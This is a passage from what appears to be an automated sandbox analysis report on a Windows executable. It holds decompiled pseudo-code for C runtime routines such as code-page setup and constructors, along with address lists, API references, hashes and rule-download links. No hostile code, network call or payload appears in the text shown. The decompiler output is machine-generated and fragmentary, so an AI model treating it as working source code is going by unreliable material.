												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E0123AD5D( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E0123AE73(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E0122F1A0(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x124d838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x124d820; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E0123AD5D(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x124d82c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E0123AE0E(_t98);
				}
				L39:
				return E0122EA8A(_v8 ^ _t99);
			}






























                                                                                                                                                    0x0123b1d8
                                                                                                                                                    0x0123b1df
                                                                                                                                                    0x0123b1e7
                                                                                                                                                    0x0123b1ef
                                                                                                                                                    0x0123b1f4
                                                                                                                                                    0x0123b205
                                                                                                                                                    0x0123b205
                                                                                                                                                    0x0123b207
                                                                                                                                                    0x0123b209
                                                                                                                                                    0x0123b20b
                                                                                                                                                    0x0123b20e
                                                                                                                                                    0x0123b20e
                                                                                                                                                    0x0123b214
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b21a
                                                                                                                                                    0x0123b21b
                                                                                                                                                    0x0123b21e
                                                                                                                                                    0x0123b221
                                                                                                                                                    0x0123b226
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b228
                                                                                                                                                    0x0123b228
                                                                                                                                                    0x0123b22e
                                                                                                                                                    0x0123b2fc
                                                                                                                                                    0x0123b234
                                                                                                                                                    0x0123b234
                                                                                                                                                    0x0123b23a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b240
                                                                                                                                                    0x0123b244
                                                                                                                                                    0x0123b24a
                                                                                                                                                    0x0123b24c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b252
                                                                                                                                                    0x0123b257
                                                                                                                                                    0x0123b25d
                                                                                                                                                    0x0123b25f
                                                                                                                                                    0x0123b2e9
                                                                                                                                                    0x0123b2ef
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b2f1
                                                                                                                                                    0x0123b2f2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b2f2
                                                                                                                                                    0x0123b265
                                                                                                                                                    0x0123b26f
                                                                                                                                                    0x0123b274
                                                                                                                                                    0x0123b27c
                                                                                                                                                    0x0123b282
                                                                                                                                                    0x0123b283
                                                                                                                                                    0x0123b286
                                                                                                                                                    0x0123b2d9
                                                                                                                                                    0x0123b288
                                                                                                                                                    0x0123b288
                                                                                                                                                    0x0123b28c
                                                                                                                                                    0x0123b28f
                                                                                                                                                    0x0123b291
                                                                                                                                                    0x0123b291
                                                                                                                                                    0x0123b294
                                                                                                                                                    0x0123b296
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b298
                                                                                                                                                    0x0123b29b
                                                                                                                                                    0x0123b2a6
                                                                                                                                                    0x0123b2a6
                                                                                                                                                    0x0123b2a8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b2a0
                                                                                                                                                    0x0123b2a5
                                                                                                                                                    0x0123b2a5
                                                                                                                                                    0x0123b2a5
                                                                                                                                                    0x0123b2aa
                                                                                                                                                    0x0123b2ad
                                                                                                                                                    0x0123b2b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b2b0
                                                                                                                                                    0x0123b291
                                                                                                                                                    0x0123b2b2
                                                                                                                                                    0x0123b2b2
                                                                                                                                                    0x0123b2b5
                                                                                                                                                    0x0123b2ba
                                                                                                                                                    0x0123b2ba
                                                                                                                                                    0x0123b2bd
                                                                                                                                                    0x0123b2be
                                                                                                                                                    0x0123b2be
                                                                                                                                                    0x0123b2be
                                                                                                                                                    0x0123b2ce
                                                                                                                                                    0x0123b2d4
                                                                                                                                                    0x0123b2d4
                                                                                                                                                    0x0123b2de
                                                                                                                                                    0x0123b2e1
                                                                                                                                                    0x0123b2e2
                                                                                                                                                    0x0123b2e3
                                                                                                                                                    0x0123b3a7
                                                                                                                                                    0x0123b3a8
                                                                                                                                                    0x0123b3ad
                                                                                                                                                    0x0123b3ae
                                                                                                                                                    0x0123b3ae
                                                                                                                                                    0x0123b25f
                                                                                                                                                    0x0123b24c
                                                                                                                                                    0x0123b23a
                                                                                                                                                    0x0123b22e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b3b0
                                                                                                                                                    0x0123b30e
                                                                                                                                                    0x0123b316
                                                                                                                                                    0x0123b316
                                                                                                                                                    0x0123b31a
                                                                                                                                                    0x0123b31d
                                                                                                                                                    0x0123b323
                                                                                                                                                    0x0123b326
                                                                                                                                                    0x0123b326
                                                                                                                                                    0x0123b329
                                                                                                                                                    0x0123b32b
                                                                                                                                                    0x0123b32d
                                                                                                                                                    0x0123b32d
                                                                                                                                                    0x0123b330
                                                                                                                                                    0x0123b332
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b334
                                                                                                                                                    0x0123b337
                                                                                                                                                    0x0123b353
                                                                                                                                                    0x0123b353
                                                                                                                                                    0x0123b355
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b33c
                                                                                                                                                    0x0123b342
                                                                                                                                                    0x0123b344
                                                                                                                                                    0x0123b34a
                                                                                                                                                    0x0123b34e
                                                                                                                                                    0x0123b34e
                                                                                                                                                    0x0123b34f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b34f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b342
                                                                                                                                                    0x0123b357
                                                                                                                                                    0x0123b35a
                                                                                                                                                    0x0123b35d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b35d
                                                                                                                                                    0x0123b35f
                                                                                                                                                    0x0123b35f
                                                                                                                                                    0x0123b362
                                                                                                                                                    0x0123b363
                                                                                                                                                    0x0123b366
                                                                                                                                                    0x0123b369
                                                                                                                                                    0x0123b369
                                                                                                                                                    0x0123b36f
                                                                                                                                                    0x0123b372
                                                                                                                                                    0x0123b381
                                                                                                                                                    0x0123b38a
                                                                                                                                                    0x0123b38f
                                                                                                                                                    0x0123b395
                                                                                                                                                    0x0123b396
                                                                                                                                                    0x0123b396
                                                                                                                                                    0x0123b399
                                                                                                                                                    0x0123b39c
                                                                                                                                                    0x0123b39f
                                                                                                                                                    0x0123b3a2
                                                                                                                                                    0x0123b3a2
                                                                                                                                                    0x0123b3a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b1f6
                                                                                                                                                    0x0123b1f7
                                                                                                                                                    0x0123b1fd
                                                                                                                                                    0x0123b3b1
                                                                                                                                                    0x0123b3c0

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0123AD9B: GetOEMCP.KERNEL32(00000000,?,?,0123B024,?), ref: 0123ADC6
                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0123B069,?,00000000), ref: 0123B244
                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,0123B069,?,?,?,0123B069,?,00000000), ref: 0123B257
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                    • Opcode ID: e7438e939b7b850c8d791212f312ae191d396401f5246487a97f274375b2b733
                                                                                                                                                    • Instruction ID: 69778493a5134644e90d279d2650f6439393b5b6c917ac4fc8fa2237fde9d5fa
                                                                                                                                                    • Opcode Fuzzy Hash: e7438e939b7b850c8d791212f312ae191d396401f5246487a97f274375b2b733
                                                                                                                                                    • Instruction Fuzzy Hash: DB5154B0E203169FEB21CF7AC4846BFBBF5EF91210F14416ECA9A8B251D7359146CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012113B6, Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E012113B6(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0122E0E4(_t56, _t91);
				_push(_t78);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E012195B6(_t78);
				 *_t89 = 0x12425b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E01216027(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0121C767(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E01211550();
				_t62 = E01211550();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0122E0A0(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0121AFBD(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0122F1A0(_t87, _t89 + 0x2208, 0, 0x40);
				E0122F1A0(_t87, _t89 + 0x2248, 0, 0x34);
				E0122F1A0(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}















                                                                                                                                                    0x012113b6
                                                                                                                                                    0x012113b6
                                                                                                                                                    0x012113b6
                                                                                                                                                    0x012113b6
                                                                                                                                                    0x012113b6
                                                                                                                                                    0x012113bb
                                                                                                                                                    0x012113bc
                                                                                                                                                    0x012113bf
                                                                                                                                                    0x012113c1
                                                                                                                                                    0x012113c4
                                                                                                                                                    0x012113cb
                                                                                                                                                    0x012113d7
                                                                                                                                                    0x012113da
                                                                                                                                                    0x012113e5
                                                                                                                                                    0x012113e9
                                                                                                                                                    0x012113f4
                                                                                                                                                    0x012113fa
                                                                                                                                                    0x01211400
                                                                                                                                                    0x0121140b
                                                                                                                                                    0x01211413
                                                                                                                                                    0x01211417
                                                                                                                                                    0x0121141a
                                                                                                                                                    0x01211420
                                                                                                                                                    0x01211426
                                                                                                                                                    0x01211428
                                                                                                                                                    0x0121144d
                                                                                                                                                    0x0121142a
                                                                                                                                                    0x0121142f
                                                                                                                                                    0x01211435
                                                                                                                                                    0x01211438
                                                                                                                                                    0x0121143e
                                                                                                                                                    0x01211449
                                                                                                                                                    0x01211440
                                                                                                                                                    0x01211442
                                                                                                                                                    0x01211442
                                                                                                                                                    0x0121143e
                                                                                                                                                    0x01211450
                                                                                                                                                    0x0121145c
                                                                                                                                                    0x01211463
                                                                                                                                                    0x0121146a
                                                                                                                                                    0x01211473
                                                                                                                                                    0x0121147e
                                                                                                                                                    0x01211488
                                                                                                                                                    0x0121148e
                                                                                                                                                    0x01211494
                                                                                                                                                    0x0121149a
                                                                                                                                                    0x012114a0
                                                                                                                                                    0x012114a6
                                                                                                                                                    0x012114ac
                                                                                                                                                    0x012114b3
                                                                                                                                                    0x012114b9
                                                                                                                                                    0x012114bf
                                                                                                                                                    0x012114c5
                                                                                                                                                    0x012114cb
                                                                                                                                                    0x012114d1
                                                                                                                                                    0x012114e0
                                                                                                                                                    0x012114ef
                                                                                                                                                    0x012114fa
                                                                                                                                                    0x01211502
                                                                                                                                                    0x01211508
                                                                                                                                                    0x0121150e
                                                                                                                                                    0x01211514
                                                                                                                                                    0x0121151a
                                                                                                                                                    0x01211520
                                                                                                                                                    0x01211526
                                                                                                                                                    0x0121152f
                                                                                                                                                    0x01211535
                                                                                                                                                    0x0121153b
                                                                                                                                                    0x01211543
                                                                                                                                                    0x0121154d

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 012113B6
                                                                                                                                                      • Part of subcall function 01216027: __EH_prolog.LIBCMT ref: 0121602C
                                                                                                                                                      • Part of subcall function 0121C767: __EH_prolog.LIBCMT ref: 0121C76C
                                                                                                                                                      • Part of subcall function 0121C767: new.LIBCMT ref: 0121C7AF
                                                                                                                                                      • Part of subcall function 0121C767: new.LIBCMT ref: 0121C7D3
                                                                                                                                                    • new.LIBCMT ref: 0121142F
                                                                                                                                                      • Part of subcall function 0121AFBD: __EH_prolog.LIBCMT ref: 0121AFC2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 9843de5cec1417c09cc7bb8b4dd4e933f66853626600a38eeb3e7e816fe7a1e6
                                                                                                                                                    • Instruction ID: 05382221c9d791a706b2592dda38077bd1dfdf7fd64248e796a84383cbaf96d8
                                                                                                                                                    • Opcode Fuzzy Hash: 9843de5cec1417c09cc7bb8b4dd4e933f66853626600a38eeb3e7e816fe7a1e6
                                                                                                                                                    • Instruction Fuzzy Hash: 8A4115B0915B419EE724DF7984849E6FAE5FF28300F90492ED6EE83281DB726564CB11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012113B1, Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E012113B1(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0122E0E4(E01241AE7, _t91);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E012195B6(_t78);
				 *_t89 = 0x12425b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E01216027(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0121C767(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E01211550();
				_t62 = E01211550();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0122E0A0(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0121AFBD(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0122F1A0(_t87, _t89 + 0x2208, 0, 0x40);
				E0122F1A0(_t87, _t89 + 0x2248, 0, 0x34);
				E0122F1A0(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}














                                                                                                                                                    0x012113b1
                                                                                                                                                    0x012113b1
                                                                                                                                                    0x012113b1
                                                                                                                                                    0x012113b1
                                                                                                                                                    0x012113b6
                                                                                                                                                    0x012113bf
                                                                                                                                                    0x012113c1
                                                                                                                                                    0x012113c4
                                                                                                                                                    0x012113cb
                                                                                                                                                    0x012113d7
                                                                                                                                                    0x012113da
                                                                                                                                                    0x012113e5
                                                                                                                                                    0x012113e9
                                                                                                                                                    0x012113f4
                                                                                                                                                    0x012113fa
                                                                                                                                                    0x01211400
                                                                                                                                                    0x0121140b
                                                                                                                                                    0x01211413
                                                                                                                                                    0x01211417
                                                                                                                                                    0x0121141a
                                                                                                                                                    0x01211420
                                                                                                                                                    0x01211426
                                                                                                                                                    0x01211428
                                                                                                                                                    0x0121144d
                                                                                                                                                    0x0121142a
                                                                                                                                                    0x0121142f
                                                                                                                                                    0x01211435
                                                                                                                                                    0x01211438
                                                                                                                                                    0x0121143e
                                                                                                                                                    0x01211449
                                                                                                                                                    0x01211440
                                                                                                                                                    0x01211442
                                                                                                                                                    0x01211442
                                                                                                                                                    0x0121143e
                                                                                                                                                    0x01211450
                                                                                                                                                    0x0121145c
                                                                                                                                                    0x01211463
                                                                                                                                                    0x0121146a
                                                                                                                                                    0x01211473
                                                                                                                                                    0x0121147e
                                                                                                                                                    0x01211488
                                                                                                                                                    0x0121148e
                                                                                                                                                    0x01211494
                                                                                                                                                    0x0121149a
                                                                                                                                                    0x012114a0
                                                                                                                                                    0x012114a6
                                                                                                                                                    0x012114ac
                                                                                                                                                    0x012114b3
                                                                                                                                                    0x012114b9
                                                                                                                                                    0x012114bf
                                                                                                                                                    0x012114c5
                                                                                                                                                    0x012114cb
                                                                                                                                                    0x012114d1
                                                                                                                                                    0x012114e0
                                                                                                                                                    0x012114ef
                                                                                                                                                    0x012114fa
                                                                                                                                                    0x01211502
                                                                                                                                                    0x01211508
                                                                                                                                                    0x0121150e
                                                                                                                                                    0x01211514
                                                                                                                                                    0x0121151a
                                                                                                                                                    0x01211520
                                                                                                                                                    0x01211526
                                                                                                                                                    0x0121152f
                                                                                                                                                    0x01211535
                                                                                                                                                    0x0121153b
                                                                                                                                                    0x01211543
                                                                                                                                                    0x0121154d

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 012113B6
                                                                                                                                                      • Part of subcall function 01216027: __EH_prolog.LIBCMT ref: 0121602C
                                                                                                                                                      • Part of subcall function 0121C767: __EH_prolog.LIBCMT ref: 0121C76C
                                                                                                                                                      • Part of subcall function 0121C767: new.LIBCMT ref: 0121C7AF
                                                                                                                                                      • Part of subcall function 0121C767: new.LIBCMT ref: 0121C7D3
                                                                                                                                                    • new.LIBCMT ref: 0121142F
                                                                                                                                                      • Part of subcall function 0121AFBD: __EH_prolog.LIBCMT ref: 0121AFC2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 58615309e89b1ac91b9a12c21f58bde0057b679afc59d5708e2e91ef0fe3e90b
                                                                                                                                                    • Instruction ID: 0155f114d0073904e4debce94f7893f0ffeb2c9306975113b2d1e94def009666
                                                                                                                                                    • Opcode Fuzzy Hash: 58615309e89b1ac91b9a12c21f58bde0057b679afc59d5708e2e91ef0fe3e90b
                                                                                                                                                    • Instruction Fuzzy Hash: 1A4125B0815B419EE724DF7984849E7FAE5FF28300F904A2ED2EE83281DB326564CB11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123B007, Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                    			E0123B007(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E01238E25(__ebx, __ecx, __edx);
				E0123B12E(__ebx, __ecx, __edx, _t81);
				_t31 = E0123AD9B(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E01238398(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E0123B1D0(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E0123814F();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x124db20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0x124db20) {
								E0123835E( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x124dda0 & 0x00000001;
							if(( *0x124dda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E0123AC71(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0x124dd40; // 0x10e1358
									 *0x124d814 = _t44;
								}
							}
						}
						L6:
						E0123835E(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E012387DA())) = 0x16;
						goto L5;
					}
				}
			}


















                                                                                                                                                    0x0123b007
                                                                                                                                                    0x0123b014
                                                                                                                                                    0x0123b017
                                                                                                                                                    0x0123b01f
                                                                                                                                                    0x0123b028
